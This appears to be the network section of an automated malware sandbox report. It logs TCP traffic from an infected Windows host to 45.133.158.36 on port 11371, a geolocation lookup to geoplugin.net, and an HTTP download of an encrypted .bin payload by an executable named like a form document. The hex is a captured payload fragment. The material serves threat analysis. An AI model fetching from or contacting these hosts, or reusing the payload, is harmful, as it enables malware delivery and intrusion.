                                                                                                            Nov 21, 2024 12:20:22.453648090 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.454478025 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.454503059 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.454546928 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.455615997 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.455657005 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.455698967 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.456542969 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.456640005 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.456685066 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.457703114 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.457842112 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.457880974 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.458631039 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.458741903 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.458779097 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.459675074 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.459695101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.459732056 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.460743904 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.460871935 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.460915089 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.461759090 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.461868048 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.461913109 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.462874889 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.463030100 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.463074923 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.463866949 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464083910 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464128017 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.464881897 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.464986086 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.465023994 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.465919971 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.466027975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.466072083 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.466959953 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.467066050 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.467112064 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.468112946 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.468174934 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.468219042 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.469054937 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.469276905 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.469382048 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.470102072 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.470215082 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.470261097 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.471147060 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.471198082 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.471241951 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.472198963 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.472295046 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.472327948 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.473216057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.473311901 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.473345995 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.474257946 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.474466085 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.474512100 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.475366116 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.475382090 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.475421906 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.476356030 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.476440907 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.476486921 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.477385998 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.477499008 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.477533102 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.478487015 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.478559971 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.478598118 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.479515076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.479640007 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.479675055 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.480613947 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.480633974 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.480670929 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.481597900 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.481729031 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.481766939 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.483213902 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.483232975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.483266115 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.484435081 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484450102 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484482050 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.484812975 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484834909 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.484870911 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.485719919 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.485924006 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.485966921 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.486802101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.486893892 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.486936092 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.487812996 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.487932920 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.487973928 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.488866091 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.488959074 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.488998890 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.489896059 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.489917994 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.489970922 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.490935087 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.491056919 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.491095066 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.492001057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.492105961 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.492139101 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.493046045 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.493145943 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.493179083 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.494062901 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.494165897 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.494199991 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.495134115 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.495238066 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.495292902 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.496289015 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.496332884 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.496376991 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.497208118 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.497307062 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.497353077 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.498300076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.498366117 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.498410940 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.499289989 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.499494076 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.499532938 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.500341892 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.500488997 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.500529051 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.501403093 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.501537085 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.501585007 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.502401114 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.502563953 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.502610922 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.503604889 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.503676891 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.503720999 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.504566908 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.504667044 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.504713058 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.505877972 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.505933046 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.505980968 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.506578922 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.553447962 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.662400007 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662425041 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662580967 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.662677050 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662847996 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.662893057 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.663803101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.663894892 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.663944960 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.664771080 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.664875031 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.664921045 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.665815115 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.665980101 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.666028023 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.666852951 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.666966915 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.667012930 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.667911053 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.668135881 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.668185949 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.668976068 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.669404030 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.669449091 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.669996023 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.670120001 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.670166016 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.671075106 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.671219110 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.671268940 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.672122955 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.672173977 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.672220945 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.673094034 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.673229933 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.673280001 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.674266100 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.675056934 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.675101995 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.676316023 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.676328897 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.676338911 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.676357985 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.676364899 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.676395893 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:22.677275896 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:22.725322962 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:24.656361103 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:24.776540041 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776560068 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776568890 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776586056 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776597023 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776602030 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776606083 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:24.776611090 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776622057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776633024 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776643038 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.776647091 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:24.899466991 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.899478912 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.899483919 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.899650097 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.899662971 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.899821997 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.900639057 CET113714984045.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:24.900687933 CET4984011371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:42.366369963 CET113714983345.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:20:42.378608942 CET4983311371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:20:42.498450994 CET113714983345.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:21:12.369199038 CET113714983345.133.158.36192.168.2.7
                                                                                                            Nov 21, 2024 12:21:12.370609045 CET4983311371192.168.2.745.133.158.36
                                                                                                            Nov 21, 2024 12:21:12.490225077 CET113714983345.133.158.36192.168.2.7

                                                                                                            UDP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Nov 21, 2024 12:20:19.310261011 CET5343953192.168.2.71.1.1.1
                                                                                                            Nov 21, 2024 12:20:19.538218975 CET53534391.1.1.1192.168.2.7

                                                                                                            DNS Queries

                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                            Nov 21, 2024 12:20:19.310261011 CET192.168.2.71.1.1.10xdb65Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                            DNS Answers

                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                            Nov 21, 2024 12:19:18.142230034 CET1.1.1.1192.168.2.70x8764No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                            Nov 21, 2024 12:19:18.142230034 CET1.1.1.1192.168.2.70x8764No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                            Nov 21, 2024 12:20:19.538218975 CET1.1.1.1192.168.2.70xdb65No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                            HTTP Request Dependency Graph

                                                                                                            • 45.133.158.36
                                                                                                            • geoplugin.net

                                                                                                            HTTP Packets

                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            0192.168.2.74982645.133.158.36806836C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 21, 2024 12:20:14.208904982 CET184OUTGET /cvTLIRXJzBJoApmtjAY235.bin HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                            Host: 45.133.158.36
                                                                                                            Cache-Control: no-cache
                                                                                                            Nov 21, 2024 12:20:15.334956884 CET1236INHTTP/1.1 200 OK
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Last-Modified: Wed, 20 Nov 2024 08:11:15 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: "9afe7c5233bdb1:0"
                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                            Date: Thu, 21 Nov 2024 11:20:15 GMT
                                                                                                            Content-Length: 493120
                                                                                                            Data Raw: 08 11 46 79 49 94 9e 42 ef 20 8c 83 ee b4 e9 12 92 96 41 cc ed 3a fd 70 3a ff 0e 10 d9 6c 4a a7 72 bb ad 77 c9 27 d4 d7 ef 12 94 71 6e 74 a5 b6 98 8f 9c d3 b9 27 5d 2a b0 39 ab b4 c7 69 d4 c2 c1 18 92 03 1c 47 aa e1 00 96 13 a5 54 28 9e 4d 82 d7 9c 2b 46 84 94 17 ea 2b 22 0a 1b ab ed 1b 2e a2 4f 09 e7 9c 45 2e c6 38 88 83 ae ea f6 7b 9e 6b b1 44 d8 f3 14 16 48 f5 db 46 67 fe f2 62 bb 99 7c 49 04 7e 5f a6 cf b9 7f 79 b3 00 f7 f9 ed 7b 48 c6 99 df 55 87 ce 0c 68 ef e0 af 44 ea 9c db e0 e5 53 28 ec 7a 5f a6 60 57 e0 5d ab 83 65 6c 39 f1 b5 66 50 0f 7a 3c eb 1c 06 ee 47 29 5b 83 cc 80 82 9d 33 c9 2e d3 0e a5 c1 3f 33 d1 52 cf 5a d0 61 67 07 80 1b 9e af 37 3c fd 55 7f ae 1c 0e f2 56 36 d0 00 8c 40 c6 a0 ab f2 ea c9 69 c6 01 d4 6a ee 5a 80 ed ab b4 10 fe 3c 1a b9 53 90 d7 33 51 c7 3e 86 0c e6 97 c0 8c e1 61 d5 b2 44 00 13 23 8b 90 17 bf 0c bf 18 f9 e2 ff da a8 44 61 7c 5d bd a2 e8 c1 4f fd a6 25 5a 24 4d 01 fa 7c 85 76 2a da 66 2e 58 1f 5e cd a2 9f c5 c0 90 eb ea 6e d4 50 82 e8 1f 1f f8 b0 a1 da 13 15 20 [TRUNCATED]
                                                                                                            Data Ascii: FyIB A:p:lJrw'qnt']*9iGT(M+F+".OE.8{kDHFgb|I~_y{HUhDS(z_`W]el9fPz<G)[3.?3RZag7<UV6@ijZ<S3Q>aD#Da|]O%Z$M|v*f.X^nP ye8c]PVac"amrM2xLsAFQ% Fef^T$`QiHKQ[#NplYOotOx+"+=>{+]@M|qFO'qKf8/>kH5=hjT3o`t@ ]cF^,*!Q^|QNGtd"RTT}*`NX6G JGS9LE$RM+;%.KyA.yDvO%';z4QNJfFG<s>!boXnqG=~ }r>0"Ubz4TA]~T`ah%HSF.p8-(wW? }EV"]{Lb0a4ZEm,v5u'nAIQH*\$63yf5Fv;,V{"J[M~fG[a3 a*9%g|^q
                                                                                                            Nov 21, 2024 12:20:15.335019112 CET1236INData Raw: d5 61 3e 75 68 b1 a7 4b 09 9e b3 46 48 a2 c5 46 b9 6b 49 ea ab ef c8 2c d4 48 98 a6 95 01 79 d4 1a d7 45 f6 be 8e de 80 d2 6b 03 92 35 21 7e 56 ce 80 5b 33 96 34 df 18 7d 2a 7e 7f d8 27 3e bb 68 0a ba fb 9c e9 f2 cb a4 38 8a 03 5a dc 59 15 53 c4
                                                                                                            Data Ascii: a>uhKFHFkI,HyEk5!~V[34}*~'>h8ZYS~`Fic4*{BWkTft=B@.iz?7mw6ybUTeLu5oPUoyB6@{bS44!o.&HWZ
                                                                                                            Nov 21, 2024 12:20:15.335031986 CET1236INData Raw: c3 4d e7 38 00 f4 3f 63 c2 5b 76 b9 73 b0 7c 32 15 ac f8 25 c6 9f 91 c4 4b b3 d9 68 99 91 43 41 3a 89 35 28 79 2c b5 21 af 02 cd b6 95 d8 bd 90 0b de 43 33 95 1a 91 0d f6 78 fc 60 5f 2f f4 aa a6 31 09 a3 66 ef 42 7b e5 b0 e5 09 00 fb e4 61 b2 3c
                                                                                                            Data Ascii: M8?c[vs|2%KhCA:5(y,!C3x`_/1fB{a<r{ecbC)zjRrLu4xV^AXDEaroT,B&F $sBEpmw:Puh-g}GXkVJN-Cv(a|6^<i:V
                                                                                                            Nov 21, 2024 12:20:15.335081100 CET672INData Raw: 72 ae 3c 1f 51 96 d9 23 9a 9b e0 4e 49 9c a7 fe 83 46 13 79 f4 34 7c 36 2a b4 1d b9 25 cd 29 fe 6e 82 07 b1 47 e3 7f c5 bb a0 88 fb f3 b5 c8 1e 5f 9a 02 67 a4 e9 c1 52 8b 05 c4 b7 de ec 0d 26 00 38 7f e1 63 f3 f2 e8 60 c2 69 b9 77 c2 4b 3f fb cc
                                                                                                            Data Ascii: r<Q#NIFy4|6*%)nG_gR&8c`iwK?Qxs^4Ds^*M`0V!Q0K:h7H#'jSHzCl2pa2alzZqCzT8x|pfz/GwW>w$D]1VH
                                                                                                            Nov 21, 2024 12:20:15.335095882 CET1236INData Raw: 7a 14 50 0d 6e 84 15 be 82 da 8c 26 20 c8 6e 9d c6 ec 1f 7e fc 16 77 68 23 8b 4d 36 05 71 d5 61 54 77 3d 3a 61 8c 4d ba 9f 47 48 a2 c5 49 16 6e 4d f1 ec ef 9d 44 d4 48 98 e6 c4 c6 3d f0 2e c7 45 f6 be 4f 36 83 5b 2f 27 ae be e7 e7 d5 2c 87 58 f1
                                                                                                            Data Ascii: zPn& n~wh#M6qaTw=:aMGHInMDH=.EO6[/',XW9>#1j2-|3YfG^'Y+{9g5:?n("f_+>IG[ETci\8]:Nu._5cQ1eQe2ol&d>H!~H
                                                                                                            Nov 21, 2024 12:20:15.335108995 CET1236INData Raw: ad 7c f7 70 e9 28 37 ab c0 39 f9 e4 32 fb 10 e0 a3 c2 2d bb 1a ae 20 ce e3 22 33 b3 73 4b 2d e0 db ad 59 c6 37 a0 43 05 5d 66 bd b5 7c 5a fd 94 42 51 0a 8d 3e 36 a3 a9 12 d1 79 52 c2 1f 8b 45 bd 51 6d 54 6c 8f 14 c2 e6 e0 3a 2a 55 26 37 98 c4 fe
                                                                                                            Data Ascii: |p(792- "3sK-Y7C]f|ZBQ>6yREQmTl:*U&7nsHm!P_"lfpCa\U3OTr[}iV=;WF~;f>"U;"aE.OM0xtB9%HD{^!}yt83y-$p
